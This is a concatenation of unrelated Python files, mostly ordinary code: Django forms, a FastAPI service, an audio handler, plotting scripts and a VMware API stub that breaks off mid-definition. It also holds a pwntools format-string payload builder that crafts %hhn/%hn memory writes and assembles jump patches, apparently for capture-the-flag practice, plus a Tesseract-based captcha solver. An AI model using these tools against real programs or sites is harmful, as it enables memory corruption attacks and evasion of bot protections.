JS_ASSETS_FILTERS = 'rjsmin'  # webassets filter used to minify JS
CSS_ASSETS = ['']  # source CSS files to bundle (empty placeholder entry)
CSS_ASSETS_OUTPUT = 'styles/vulyk-tagging.css'  # bundled CSS output path
CSS_ASSETS_FILTERS = 'cssmin'  # webassets filter used to minify CSS
|
import crea as stm
import sys
# Module-level singleton; populated lazily by shared_cread_instance().
_shared_cread_instance = None
def get_config_node_list():
    """Return the configured node list (comma-separated in storage),
    or None when no 'nodes' setting is present."""
    from creabase.storage import configStorage
    raw = configStorage.get('nodes', None)
    if not raw:
        return None
    return raw.split(',')
def shared_cread_instance():
    """ This method will initialize _shared_cread_instance and return it.
    The purpose of this method is to have offer single default Crea
    instance that can be reused by multiple classes. """
    global _shared_cread_instance
    if not _shared_cread_instance:
        # Use version_info instead of the old lexicographic string compare
        # of sys.version (e.g. '3.10...' vs '3.0'), which is unreliable.
        if sys.version_info[0] >= 3:
            _shared_cread_instance = stm.cread.Cread(
                nodes=get_config_node_list())
        else:
            _shared_cread_instance = stm.Cread(
                nodes=get_config_node_list())
    return _shared_cread_instance
def set_shared_cread_instance(cread_instance):
    """Override the default Crea instance used by every consumer of
    _shared_cread_instance."""
    global _shared_cread_instance
    _shared_cread_instance = cread_instance
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
# Version 1.0
# Author: WildfootW
# GitHub: github.com/WildfootW
# Copyleft (C) 2020 WildfootW All rights reversed.
#
from pwn import *
class Error(Exception):
    """
    Base class for exceptions in this module.
    """
    pass
class LengthError(Error):
    """
    Raised when "P_index_forepart_payload_len" (or an ljust width) is too
    short for the payload being built.
    """
    def __init__(self, message):
        # Chain to the base Exception so args / str() stay consistent
        # instead of relying on BaseException.__new__ alone.
        super().__init__(message)
        self.message = message
class format_s:
    """Chainable builder for printf format-string payloads.

    Tracks both the raw payload bytes (payload_string) and the number of
    characters printf will have emitted once the payload runs (value_now),
    which the %hhn/%hn write directives depend on.
    """
    value_now = 0          # characters printf will have printed so far
    payload_string = b""   # payload bytes accumulated so far

    def start(self):
        """Reset the builder; returns self for chaining."""
        self.value_now = 0
        self.payload_string = b""
        return self

    def ljust(self, size, byte = b'W'):
        """Pad the payload out to exactly `size` bytes with `byte`."""
        current = len(self.payload_string)
        if current > size: # requested width is shorter than what we already have
            print()
            raise LengthError(f"ljust size {size} is too short for payload length {current} now.")
        self.value_now += size - current
        self.payload_string = self.payload_string.ljust(size, byte)
        return self

    def append(self, append_s):
        """Append raw bytes, counting them toward the printed length."""
        self.value_now += len(append_s)
        self.payload_string += append_s
        return self

    def get(self):
        """Return the payload built so far."""
        return self.payload_string

    def s(self, parameter_index):
        """Append a %N$s read of the given printf parameter."""
        return self.append(b"%%%d$s" % parameter_index)

    def hhn(self, write_value, parameter_index):
        """Append padding plus %N$hhn so the low byte written equals write_value."""
        gap = (write_value - self.value_now) % 0x100
        if gap:
            self.payload_string += b"%%%dc%%%d$hhn" % (gap, parameter_index)
        else:
            self.payload_string += b"%%%d$hhn" % (parameter_index)
        self.value_now += gap
        return self

    def hn(self, write_value, parameter_index):
        """Append padding plus %N$hn so the low two bytes written equal write_value."""
        gap = (write_value - self.value_now) % 0x10000
        if gap:
            self.payload_string += b"%%%dc%%%d$hn" % (gap, parameter_index)
        else:
            self.payload_string += b"%%%d$hn" % (parameter_index)
        self.value_now += gap
        return self
class auto_format_s(format_s):
    """format_s variant that hands out printf parameter indices automatically.

    Layout: the format directives come first, padded out to
    P_index_forepart_payload_len * operating_address_size bytes, followed by
    the target addresses — so the n-th address sits at parameter index
    P_index_begin + P_index_forepart_payload_len + n.

    Example payload (P_index_forepart_payload_len = 10):
        %70c%16$hhn%192c%17$hhn ... %23$hhnAAAAAA <eight 8-byte addresses>
    """
    P_index_begin = 0                 # parameter index that points at the payload start
    P_index_forepart_payload_len = 0  # guessed directive-part length, in address slots
    P_index_now = 0                   # how many address slots have been handed out
    operating_address_size = 0        # usually 8 bytes (x64) or 4 bytes (x86)

    def start(self, operating_address_size = 8, P_index_forepart_payload_len = 1, begin_paramenter = 6):
        """Reset payload and all index counters; returns self for chaining."""
        format_s.start(self)
        self.P_index_forepart_payload_len = P_index_forepart_payload_len
        self.P_index_begin = begin_paramenter
        self.operating_address_size = operating_address_size
        self.P_index_now = 0
        return self

    def auto_get_P(self, increase_P_index_now = True):
        """Return the parameter index of the next address slot."""
        slot = self.P_index_begin + self.P_index_forepart_payload_len + self.P_index_now
        if increase_P_index_now:
            self.P_index_now += 1
        return slot

    def auto_hhn(self, write_value, times):
        """Write write_value one byte at a time via consecutive %hhn slots."""
        for shift in range(times):
            self.hhn((write_value >> (shift * 8)) & 0xff, self.auto_get_P())
        return self

    def auto_hn(self, write_value, times):
        """Write write_value 16 bits at a time via consecutive %hn slots."""
        for shift in range(times):
            self.hn((write_value >> (shift * 16)) & 0xffff, self.auto_get_P())
        return self

    def auto_s(self):
        """Append a %N$s read for the next address slot."""
        return self.s(self.auto_get_P())

    def auto_ljust(self, byte = b'W'):
        """Pad the directive part out to its reserved length."""
        return self.ljust(self.P_index_forepart_payload_len * self.operating_address_size, byte)
def _hex_group4(hexcode):
    """Group a hex string into space-separated 4-char (2-byte) chunks;
    a trailing odd byte is appended without padding."""
    grouped = ""
    for i in range(len(hexcode) // 4):
        grouped += hexcode[i * 4:i * 4 + 4]
        grouped += " "
    if len(hexcode) % 4:
        grouped += hexcode[-2:]
    return grouped
def print_patch(asm_code, byte_amount = 0):
    """Assemble `asm_code` (via pwntools' asm) and print its hex bytes.

    `byte_amount` extra 0x90 (nop) bytes are appended as padding.  The
    bytes are printed twice: grouped from the first byte, then shifted by
    one byte, so both 2-byte alignments can be eyeballed.  The previously
    duplicated grouping loops are factored into _hex_group4().
    """
    print(" patch for asm : ".center(60, "="))
    print(asm_code)
    asm_hexcode = asm(asm_code).hex()
    for _ in range(byte_amount):
        asm_hexcode += "90"  # nop padding
    print(_hex_group4(asm_hexcode))
    print("\n or\n")
    # Same bytes with the first byte split off, then grouped again.
    print(asm_hexcode[:2] + " " + _hex_group4(asm_hexcode[2:]))
    print("".center(60, "="))
# Module-level default builder instance for quick use.
fmt = format_s()
if __name__ == "__main__":
    # Self-test / usage demo (uses pwntools' log and p64 helpers).
    def print_payload(payload):
        # Log a payload and its total length.
        log.warning("payload: " + str(payload))
        log.warning("payload length: " + str(len(payload)))
        print("\n")
    log.info("Test format_s()")
    # usage
    target_address = 0x60106c
    write_value = 0xfaceb00c
    # Single-byte write, padded to 16 bytes, address appended at the end.
    payload = fmt.start().hhn(0xda, 8).ljust(16, b"A").append(p64(target_address)).get()
    print_payload(payload)
    # Four-byte write spread over four %hhn slots at parameters 12..15.
    payload = fmt.start().hhn(0xfa, 12).hhn(0xce, 13).hhn(0xb0, 14).hhn(0x0c, 15).ljust((12 - 6) * 8, b"A").append(p64(target_address)).append(p64(target_address + 0x1)).append(p64(target_address + 0x2)).append(p64(target_address + 0x3)).get()
    print_payload(payload)
    log.info("Test auto_format_s()")
    #start(self, operating_address_size = 8, P_index_forepart_payload_len = 1, begin_paramenter = 6):
    fmt = auto_format_s()
    fmt.start(operating_address_size = 8,P_index_forepart_payload_len = 19)
    fmt.auto_hhn(write_value, 8).auto_s().auto_hn(write_value, 8).auto_ljust()
    payload = fmt.get()
    print_payload(payload)
    asm_code = """
    mov eax, 0x4007eb
    jmp eax
    """
    print_patch(asm_code, 5)
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from mwptoolkit.module.Graph import gcn,graph_module |
import base64
import random
import re
import string
import cv2
import numpy as np
import pytesseract
class CaptchaDecode:
    """Decode captcha images to text via OpenCV preprocessing and Tesseract OCR."""
    def decode_response(self, response):
        """Extract the base64 image from `response`, save it under captcha/,
        and return (decoded_text, saved_path)."""
        image_b64 = response["result"]["image"]
        image_data = self.decode_b64(image_b64)
        path = self.generate_random_name()
        self.write_data_image(image_data, path)
        return self.decrypt(path), path
    def decode_path(self, path):
        """OCR an already-saved captcha image file."""
        return self.decrypt(path)
    @staticmethod
    def generate_random_name():
        """Return a random 'captcha/<10 ASCII letters>.jpg' path.

        NOTE(review): assumes the captcha/ directory already exists.
        """
        return (
            "captcha/" +
            "".join(random.choice(string.ascii_letters)
                    for _ in range(10)) + ".jpg")
    @staticmethod
    def write_data_image(data, path):
        """Write raw image bytes to `path`."""
        with open(path, "wb") as f:
            f.write(data)
    @staticmethod
    def decode_b64(data):
        """Decode base64-encoded image data to bytes."""
        return base64.b64decode(data)
    @staticmethod
    def decrypt(path):
        """OCR the captcha at `path`; returns '' on any failure (best-effort)."""
        try:
            frame = cv2.imread(path)
            hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
            # Mask out low-saturation background so only the glyphs remain.
            mask = cv2.inRange(hsv, np.array([30, 120, 0]),
                               np.array([255, 255, 255]))
            # Tesseract config variables must be passed with -c; without it
            # the tessedit_char_whitelist setting was silently ineffective.
            text = pytesseract.image_to_string(
                mask,
                config=f'--psm 8 -c tessedit_char_whitelist={string.ascii_letters + string.digits}'
            )
            text = re.sub("[^A-Za-z0-9]", "", text)
        except Exception as e:
            # Deliberate best-effort: report and return '' rather than crash.
            print(e)
            return ''
        return text
|
"""
author : abhishek goswami
abhishekg785@gmail.com
audio.py module
simply handles all the i/o operations related to the audio
such as user audio input and output
"""
import pyaudio # handles the record and play of the audio files
import audioop # lib for handling math operations on the audio file
import wave
import tempfile
import pyttsx
from stt import STTHandler
class AudioHandler:
    """Microphone/speaker front-end (Python 2).

    Records audio with PyAudio, detects speech using an RMS-based noise
    threshold, hands recordings to STTHandler for speech-to-text, and
    speaks responses with pyttsx.
    """
    def __init__(self):
        print 'Cons of the AudioHandler Invoked'
        self._audio = pyaudio.PyAudio()
        self.STTHandler = STTHandler()
    def fetchThreshold(self):
        """Sample ambient noise for THRESHOLD_TIME seconds and derive the
        RMS level above which input counts as a disturbance.
        :return: the computed threshold value
        """
        THRESHOLD_MULTIPLIER = 1.8
        RATE = 16000
        CHUNK = 1024
        # no of seconds to allow to establish threshold
        THRESHOLD_TIME = 1
        # recording system
        stream = self._audio.open(
            format = pyaudio.paInt16,
            channels = 1,
            rate = RATE,
            input = True,
            frames_per_buffer = CHUNK
        )
        # stores the audio data
        frames = []
        # stores the lastN score values
        lastN = [i for i in range(20)]
        # keep a running average of the last RMS scores to establish the baseline
        for i in range(0, RATE / CHUNK * THRESHOLD_TIME):
            data = stream.read(CHUNK)
            frames.append(data)
            # saves this data point as a source
            lastN.pop(0)
            lastN.append(self.getAudioRMS(data))
            average = sum(lastN) / len(lastN)
            print lastN
        stream.stop_stream()
        stream.close()
        # this will be set as a limit to cause the disturbance to be over
        THRESHOLD = average * THRESHOLD_MULTIPLIER
        return THRESHOLD
    def invokeListener(self, KEYWORD):
        """ Will be used to activate our system to listen for the commands
        when the user says something, in our case it will be a keyword.
        I will be using 'Hiro' keyword for the moment :P
        :param KEYWORD: The keyword through which the system will get a activated or starts listening for the commands
        :return: (THRESHOLD, KEYWORD) when the keyword was heard,
                 (None, None) when nothing was heard,
                 (False, text) when speech was heard but without the keyword
        """
        THRESHOLD_MULTIPLIER = 1.8 # will be used to check is user has said something or not
        # pyaudio parameters
        RATE = 16000
        CHUNK = 1024
        LISTEN_TIME = 10 # No of seconds to listen before forcing restart
        THRESHOLD_TIME = 1
        stream = self._audio.open(
            format = pyaudio.paInt16,
            channels = 1,
            rate = RATE,
            input = True,
            frames_per_buffer = CHUNK
        )
        # storing the audio data
        frames = []
        lastN = [i for i in range(30)]
        # first establish the ambient-noise threshold, as in fetchThreshold()
        for i in range(0, RATE / CHUNK * THRESHOLD_TIME):
            print 'for the threshold time'
            data = stream.read(CHUNK)
            frames.append(data)
            lastN.pop(0)
            lastN.append(self.getAudioRMS(data))
            average = sum(lastN) / len(lastN)
            print lastN
        THRESHOLD = average * THRESHOLD_MULTIPLIER
        frames = []
        isDisturbance = False
        # now listen until something louder than the threshold occurs
        for i in range(0, RATE / CHUNK * LISTEN_TIME):
            print 'for the listen time'
            data = stream.read(CHUNK)
            frames.append(data)
            score = self.getAudioRMS(data)
            print 'score' + str(score)
            print 'thresh' + str(THRESHOLD)
            if score > THRESHOLD:
                isDisturbance = True
                print "Disturbance detected !"
                break
        if not isDisturbance:
            print "No Disturbance detected"
            stream.stop_stream()
            stream.close()
            return (None, None)
        # keep only the tail just before the disturbance, then record a bit more
        frames = frames[-20:]
        DELAY_MULTIPLIER = 1
        for i in range(0, RATE / CHUNK * DELAY_MULTIPLIER):
            print 'for the the extra time'
            data = stream.read(CHUNK)
            frames.append(data)
        stream.stop_stream()
        stream.close()
        # temporary file storage and finding the text in the audio file usig wit.ai cool!
        with tempfile.NamedTemporaryFile(mode='w+b') as f:
            wav_fp = wave.open(f, 'wb')
            wav_fp.setnchannels(1)
            wav_fp.setsampwidth(pyaudio.get_sample_size(pyaudio.paInt16))
            wav_fp.setframerate(RATE)
            wav_fp.writeframes(''.join(frames))
            wav_fp.close()
            f.seek(0)
            text = self.STTHandler.extractTextFromSpeech(f)
            print text
            text = str(text['_text'])
            text = text.split(' ')
            if any(KEYWORD in word for word in text):
                return (THRESHOLD, KEYWORD)
        return (False, text)
    def getAudioRMS(self, data):
        """Measure of the power in an audio signal
        :param data: chunk data of the audio file
        :return: calculated score
        """
        rms = audioop.rms(data, 2)
        score = rms / 3
        return score
    def getUserAudioInput(self, THRESHOLD = None, LISTEN = True):
        """Listens for the user audio input command
        Records until a seecond of silence or times out after 12 seconds
        Returns the first matching string or None
        :param THRESHOLD: The limit over which the disturbance occurs
        :param LISTEN: to listen or not
        :return: Speech converted to text using STTHandler module
        """
        text = self.getAllActiveInput(THRESHOLD, LISTEN)
        return text
    def getAllActiveInput(self, THRESHOLD = None, LISTEN = True):
        """Record the user audio input and times out after 12 seconds
        Returns a list of matching options or None
        :param THRESHOLD: The limit over which the disturbance occurs
        :param LISTEN: to listen or not
        :return: Speech converted to text using STTHandler module
        """
        RATE = 16000
        CHUNK = 1024
        LISTEN_TIME = 12
        # check if no threshold is provided
        if THRESHOLD is None:
            THRESHOLD = self.fetchThreshold();
        # play some audio here to indicate that our system has started listening bro :)
        self.speak('Give your command')
        # recodring stream
        stream = self._audio.open(
            format = pyaudio.paInt16,
            channels = 1,
            rate = RATE,
            input = True,
            frames_per_buffer = CHUNK
        )
        frames = []
        lastN = [THRESHOLD * 1.2 for i in range(30)]
        # record until the running average drops below the threshold (silence)
        for i in range(0, RATE / CHUNK * LISTEN_TIME):
            print 'LISTENING FOR COMMANDS'
            data = stream.read(CHUNK)
            frames.append(data)
            score = self.getAudioRMS(data)
            lastN.pop(0)
            lastN.append(score)
            average = sum(lastN) / float(len(lastN))
            print 'average %f', average
            print 'threshold %f', THRESHOLD * 0.8
            if(average < THRESHOLD * 0.8):
                break
            print lastN
        # play another sound here to indicate that it has listened
        self.speak('Processing your request!')
        stream.stop_stream()
        stream.close()
        with tempfile.SpooledTemporaryFile(mode='w+b') as f:
            wav_fp = wave.open(f, 'wb')
            wav_fp.setnchannels(1)
            wav_fp.setsampwidth(pyaudio.get_sample_size(pyaudio.paInt16))
            wav_fp.setframerate(RATE)
            wav_fp.writeframes(''.join(frames))
            wav_fp.close()
            f.seek(0)
            text = self.STTHandler.extractTextFromSpeech(f)
            print text
            return text['_text']
    def speak(self, phrase):
        """converts the given text or phrase to the speech
        :param phrase: The text to be converted into speech
        """
        tts = pyttsx.init()
        tts.say(str(phrase))
        tts.runAndWait()
|
#!/usr/bin/python3
from string import Template
from bottle import route, run, request, redirect, HTTPError
import FigClasses as fc_
import HTML_Templates as ht_
#####=====----- Variables -----=====#####
#####=====----- Classes -----=====#####
#####=====----- Functions -----=====#####
@route('/')
def server_root():
    """Serve the landing page containing the figure-type selection form."""
    page = ht_.HEADER + ht_.FORM_INI + ht_.FOOTER
    return page
@route('/figure', method='POST')
def figure():
    """Redirect the POSTed figure-type choice to its form page.

    (The unused `input_encoding` local was removed.)
    """
    suburl_ = '/' + str(request.forms.get('figtype'))
    redirect('/figure' + suburl_)
@route('/figure/<class_>')
def figure_class(class_):
    """Serve the input form for the requested figure type.

    Uses a lookup table instead of the old if-chain; an unknown type now
    returns 404 instead of the NameError/500 the chain produced when no
    branch matched.
    """
    forms_by_class = {
        'Quadro': ht_.FORM_QUADRO,
        'Cone': ht_.FORM_CONE,
        'Circle': ht_.FORM_CIRCLE,
        'Cube': ht_.FORM_CUBE,
        'Parallelepiped': ht_.FORM_PARALLELEPIPED,
        'Pyramid3F': ht_.FORM_PYRAMID3F,
        'Pyramid4F': ht_.FORM_PYRAMID4F,
        'Rectangle': ht_.FORM_RECTANGLE,
        'Rhombus': ht_.FORM_RHOMBUS,
        'Sphere': ht_.FORM_SPHERE,
        'Trapezoid': ht_.FORM_TRAPEZOID,
        'Triangle': ht_.FORM_TRIANGLE,
        'Cylinder': ht_.FORM_CYLINDER,
    }
    new_form_ = forms_by_class.get(class_)
    if new_form_ is None:
        raise HTTPError(404, 'Unknown figure type: ' + class_)
    return ht_.HEADER + new_form_ + ht_.FOOTER
@route('/result', method='POST')
def result(**kwargs):
    # Placeholder result page: currently renders just the empty page shell.
    return ht_.HEADER + ht_.FOOTER
#####=====----- MAIN -----=====#####
if __name__ == '__main__':
    # Local development server only (bound to loopback, debug enabled).
    run(host='127.0.0.1', port=8080, debug=True)
#####=====----- THE END -----=====######################################## |
from django.forms import ModelForm
from .models.order import Order
from .models.comment import Comment
from .models.personorder import PersonOrder
from .models.person import Person
from django import forms
import re
from django.utils.translation import gettext_lazy as _
from datetime import date
from dateutil.relativedelta import relativedelta
# deprecate
class PersonForm(forms.Form):
    """Stand-alone person contact form (marked for deprecation above)."""
    email = forms.EmailField(max_length=100)
    firstname = forms.CharField(max_length=100, required=False)
    lastname = forms.CharField(max_length=100, required=False)
class CommentForm(ModelForm):
    """Model form exposing only a Comment's text field."""
    class Meta:
        model = Comment
        fields = ['text']
class OrderSimpleForm(ModelForm):
    """Order form that also collects head/tech/owner contact details.

    The person fields are plain form fields (not Order model fields);
    save() materializes them as Person / PersonOrder records.
    """
    head_email = forms.EmailField(max_length=100, label='Email')
    head_institute = forms.CharField(max_length=300, required=False, label='Institute')
    head_firstname = forms.CharField(max_length=100, required=True, label='Firstname')
    head_lastname = forms.CharField(max_length=100, required=True, label='Lastname')
    tech_email = forms.EmailField(max_length=100, required=False, label='Email')
    tech_institute = forms.CharField(max_length=300, required=False, label='Institute')
    tech_firstname = forms.CharField(max_length=100, required=False, label='Firstname')
    tech_lastname = forms.CharField(max_length=100, required=False, label='Lastname')
    owner_email = forms.EmailField(max_length=100, label='Email')
    owner_institute = forms.CharField(max_length=300, required=False, label='Institute')
    owner_firstname = forms.CharField(max_length=100, required=False, label='Firstname')
    owner_lastname = forms.CharField(max_length=100, required=False, label='Lastname')
    end_date = forms.DateField(
        widget=forms.DateInput(format='%d.%m.%Y'),
        input_formats=['%d.%m.%Y'],
        label=_('End of the project'),
        help_text=_('The latest possible date is in 3 years')
    )
    class Meta:
        model = Order
        exclude = ['state', 'create_date', 'modify_date', 'persons']
    def __init__(self, owner=None, *args, **kwargs):
        """Prefill the person blocks from the instance being edited,
        falling back to `owner` for the owner and head roles."""
        if kwargs.get('instance'):
            initial = kwargs.setdefault('initial', {})
            owner_person = kwargs['instance'].owner()
            if owner_person is None:
                owner_person = owner
            if owner_person is not None:
                initial['owner_email'] = owner_person.email
                initial['owner_institute'] = owner_person.institute
                initial['owner_firstname'] = owner_person.first_name
                initial['owner_lastname'] = owner_person.last_name
            head_person = kwargs['instance'].head()
            if head_person is None:
                head_person = owner
            if head_person is not None:
                initial['head_email'] = head_person.email
                initial['head_institute'] = head_person.institute
                initial['head_firstname'] = head_person.first_name
                initial['head_lastname'] = head_person.last_name
            tech_person = kwargs['instance'].tech()
            if tech_person is not None:
                initial['tech_email'] = tech_person.email
                initial['tech_institute'] = tech_person.institute
                initial['tech_firstname'] = tech_person.first_name
                initial['tech_lastname'] = tech_person.last_name
            initial['end_date'] = date.today() + relativedelta(years=+3)
        ModelForm.__init__(self, *args, **kwargs)
        # The owner block is display-only.
        for field_name in ('owner_email', 'owner_institute',
                           'owner_firstname', 'owner_lastname'):
            self.fields[field_name].disabled = True
    def save(self, commit=True):
        """Save the order, then (re)link the owner/head/tech persons.

        NOTE(review): `commit` is accepted for ModelForm compatibility but
        the order is always persisted, since the PersonOrder links need a
        saved instance — confirm before relying on commit=False.
        """
        order = super().save()
        self._create_person_order(order, PersonOrder.ROLE_OWNER, 'owner')
        self._create_person_order(order, PersonOrder.ROLE_HEAD, 'head')
        self._create_person_order(order, PersonOrder.ROLE_TECH, 'tech')
        return order
    def clean(self):
        """Cross-field validation.

        Guards every cleaned_data lookup against None so field-level errors
        (missing keys) no longer cause TypeErrors here, and reports all
        problems instead of aborting on the first one.
        """
        cleaned_data = super().clean()
        protocol_nfs = cleaned_data.get("protocol_nfs")
        nfs_network = cleaned_data.get("nfs_network")
        if protocol_nfs and not nfs_network:
            # add_error only: the old add_error + raise duplicated the message
            # as a non-field error and skipped the remaining checks.
            self.add_error('nfs_network', forms.ValidationError(
                "Must fill NFS Client networks when choosing NFS V3."))
        end_date = cleaned_data.get("end_date")
        if end_date is not None and end_date > date.today() + relativedelta(years=+3):
            self.add_error('end_date', "End date should be less than 3 years in the future")
        group_name = cleaned_data.get("group_name")
        if group_name is not None and not re.match(r"^[^\s]+$", group_name):
            self.add_error('group_name', "Group name should not have spaces")
        owner_name = cleaned_data.get("owner_name")
        if owner_name is not None and not re.match(r"^[^\s]+$", owner_name):
            self.add_error('owner_name', "Owner name should not have spaces")
        directory_name = cleaned_data.get("directory_name")
        if directory_name is not None and not re.match(r"^[a-zA-Z0-9_-]+$", directory_name):
            self.add_error('directory_name', "Allowed characters are \"a-z 0-9 _ -\"")
        return cleaned_data
    def _create_person_order(self, order, role, prefix):
        """Find or create the Person described by the `prefix`_* fields and
        attach it to `order` under `role`, replacing any previous link."""
        person_email = self.cleaned_data.get(prefix + '_email')
        # Guard against None (field absent after validation errors).
        if person_email and person_email.strip():
            try:
                person = Person.objects.get(username=person_email)
            except Person.DoesNotExist:
                try:
                    person = Person.objects.get(email=person_email)
                except Person.DoesNotExist:
                    person = Person()
                    person.email = person_email
                    person.username = person_email
                    person.set_unusable_password()
                person.first_name = self.cleaned_data.get(prefix + '_firstname')
                person.institute = self.cleaned_data.get(prefix + '_institute')
                person.last_name = self.cleaned_data.get(prefix + '_lastname')
                person.save()
            try:
                PersonOrder.objects.get(person=person, order=order, role=role)
            except PersonOrder.DoesNotExist:
                try:
                    PersonOrder.objects.filter(order=order, role=role).delete()
                finally:
                    PersonOrder.objects.create(person=person, order=order, role=role)
class OrderAdminForm(OrderSimpleForm):
    """Admin variant of OrderSimpleForm: `state` is no longer excluded,
    so administrators can edit it."""
    class Meta:
        model = Order
        exclude = ['create_date', 'modify_date', 'persons']
class OrderEditForm(OrderSimpleForm):
    """Edit variant of OrderSimpleForm with most fields locked down."""
    def __init__(self, *args, **kwargs):
        super(OrderEditForm, self).__init__(*args, **kwargs)
        # Disable the same fixed set of fields the original listed one by one.
        locked_fields = (
            'project_name', 'abstract', 'notes', 'end_date', 'capacity',
            'directory_name', 'protocol_cifs', 'protocol_nfs', 'nfs_network',
            'owner_name', 'group_name', 'group_permission', 'group_cifsacls',
        )
        for field_name in locked_fields:
            self.fields[field_name].disabled = True
import matplotlib.pyplot as plt
import numpy as np
import urllib
import matplotlib.dates as mdates
def graph_data(stock):
    """Fetch and parse CSV quote history for `stock` from the Yahoo
    chartapi endpoint.

    :param stock: ticker symbol, e.g. 'AAPL'
    :return: (date, closep) numpy arrays
    """
    # `import urllib` at the top of the file does not reliably expose
    # urllib.request in Python 3; import the submodule explicitly.
    import urllib.request
    stock_price_url = 'http://chartapi.finance.yahoo.com/instrument/1.0/'+stock+'/chartdata;type=quote;range=99y/csv'
    source_code = urllib.request.urlopen(stock_price_url).read().decode()
    stock_data = []
    split_source = source_code.split('\n')
    for line in split_source:
        split_line = line.split(',')
        # Data rows have exactly 6 comma-separated values; metadata lines
        # (which contain 'values') are skipped.
        if len(split_line) == 6:
            if 'values' not in line:
                stock_data.append(line)
    # Column order in the feed: date, close, high, low, open, volume.
    date, closep, highp, lowp, openp, volume = np.loadtxt(stock_data,
                                                          delimiter=',',
                                                          unpack=True)
    return date, closep
# Demo: fetch AAPL history and print the date column (requires network
# access to the legacy Yahoo chartapi endpoint).
date, close = graph_data('AAPL')
print(date)
|
import csv
from django.core.management.base import BaseCommand
from grid.models import Element, Grid, GridPackage, Feature
from package.models import Project
class Command(BaseCommand):
    """Management command: build a hard-coded test Grid from a CSV fixture.

    CSV layout: the first row is a header whose columns 2..N are package
    (Project) slugs; each following row is a feature title followed by one
    cell value per package.
    """
    def add_arguments(self, parser):
        # Name of a CSV file located under /app/grid/cvs_fixtures/.
        parser.add_argument('filename', type=str)
    def handle(self, *args, **kwargs):
        filename = kwargs['filename']
        # The target grid is created fresh with fixed test metadata.
        grid = Grid.objects.create(**{
            'title': 'test grid',
            'slug': 'testgrid',
            'description': 'test',
            'is_draft': False,
            'is_locked': False,
            'header': True,
        })
        with open('/app/grid/cvs_fixtures/{}'.format(filename)) as csvDataFile:
            csvReader = csv.reader(csvDataFile)
            # The first header cell is ignored; the rest are project slugs.
            project_slugs = next(csvReader)[1:]
            feature_rows = []
            for row in csvReader:
                feature_rows.append({
                    'name': row[0],
                    'values': row[1:]
                })
            # Link each project to the grid and fill in one Element per feature.
            for i, project_slug in enumerate(project_slugs):
                project = Project.objects.get(slug=project_slug)
                grid_package = GridPackage.objects.create(grid=grid, package=project)
                for feature_row in feature_rows:
                    feature, _ = Feature.objects.get_or_create(grid=grid, title=feature_row['name'], description='')
                    Element.objects.create(grid_package=grid_package, feature=feature, text=feature_row['values'][i])
|
class Solution:
    def reorderSpaces(self, text: str) -> str:
        """Redistribute the spaces in `text` evenly between its words;
        any remainder is appended as trailing spaces."""
        words = text.split()
        total_spaces = text.count(' ')
        if len(words) == 1:
            # No gaps to fill: all spaces trail the single word.
            return words[0] + ' ' * total_spaces
        gap, extra = divmod(total_spaces, len(words) - 1)
        return (' ' * gap).join(words) + ' ' * extra
import spacy
# Load the es_core_news_sm model
nlp = spacy.load("es_core_news_sm")
# Print the names of the pipeline components
print(nlp.pipe_names)
# Print the full pipeline as (name, component) tuples
print(nlp.pipeline)
|
#!/usr/bin/env python3
import argparse
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import colors
# Parse the capture-log file name from the command line.
parser = argparse.ArgumentParser()
parser.add_argument('input')
args = parser.parse_args()
data = []
# Each usable log line: <frame_start> <frame_end> <userland_arrival>
# (values treated as microseconds, per the axis label below).
with open(args.input) as f:
    lines = f.readlines()
    for line in lines:
        line = line.strip()
        if len(line) <= 1:
            # skip blank/degenerate lines
            continue
        tokens = line.split()
        frame_start = int(tokens[0])
        frame_end = int(tokens[1])
        userland = int(tokens[2])
        data.append((frame_start, frame_end, userland))
data = np.asarray(data)
# Frame TX duration: end minus start timestamps.
frame_txlen = data[:,1] - data[:,0]
print(f'mean frame TX length: {np.mean(frame_txlen)}')
# Latency between TX end and the frame's arrival in host userland.
userland_latency = data[:,2] - data[:,1]
plt.hist(userland_latency, bins=200)
plt.xlabel('microseconds')
plt.title('Histogram of latency between end of image TX and its arrival in host userland')
plt.show()
|
import uvicorn
from fastapi import FastAPI
from fastapi_versioning import VersionedFastAPI
from config import config
from routers import root, auth
from databases.database import engine, Base
# Base application; a versioned wrapper is built below.
app = FastAPI(
    title='py-auth',
    description='Authentication service made by Python'
)
# Config (instantiated here; not referenced elsewhere in this file)
configuration = config.Settings()
# database: create any missing ORM tables at startup
Base.metadata.create_all(bind=engine)
# routers
app.include_router(root.router)
app.include_router(auth.router)
# Versioned_FastAPI: exposes routes under /v{major} prefixes
app = VersionedFastAPI(app,
                       prefix_format='/v{major}',
                       version_format='{major}')
if __name__ == "__main__":
    # Development entry point: serve on all interfaces, port 8080.
    uvicorn.run(app, host='0.0.0.0', port=8080)
from enum import Enum
class sms(object): # (unknown name)
   """Generated VMODL stub listing for the VMware SMS (Storage Monitoring Service) API.

   Not executable Python: class bodies use forward references to ``sms.*`` and
   rely on ``vim``/``vmodl`` names that are not imported in this file.  Each
   attribute's assigned value illustrates the VMODL type of that property
   (lists denote array-valued properties); ``# throws`` comments list the
   faults a method may raise.
   """
   class AboutInfo(vmodl.DynamicData): # sms.AboutInfo
      name = ""
      fullName = ""
      vendor = ""
      apiVersion = ""
      instanceUuid = ""
      vasaApiVersion = ""
   class EntityReference(vmodl.DynamicData): # sms.EntityReference
      id = ""
      type = sms.EntityReference.EntityType()
      class EntityType(Enum): # sms.EntityReference.EntityType
         datacenter = 0
         resourcePool = 1
         storagePod = 2
         cluster = 3
         vm = 4
         datastore = 5
         host = 6
         vmFile = 7
         scsiPath = 8
         scsiTarget = 9
         scsiVolume = 10
         scsiAdapter = 11
         nasMount = 12
   class FaultDomainFilter(vmodl.DynamicData): # sms.FaultDomainFilter
      providerId = ""
   class ReplicationGroupFilter(vmodl.DynamicData): # sms.ReplicationGroupFilter
      groupId = [ vim.vm.replication.ReplicationGroupId() ]
   class ServiceInstance(vmodl.ManagedObject): # sms.ServiceInstance
      def queryStorageManager(): # sms.ServiceInstance.queryStorageManager
         return sms.StorageManager()
      def querySessionManager(): # sms.ServiceInstance.querySessionManager
         return sms.auth.SessionManager()
      def queryAboutInfo(): # sms.ServiceInstance.queryAboutInfo
         return sms.AboutInfo()
   class StorageManager(vmodl.ManagedObject): # sms.StorageManager
      def registerProvider(providerSpec=sms.provider.ProviderSpec()): # sms.StorageManager.registerProvider
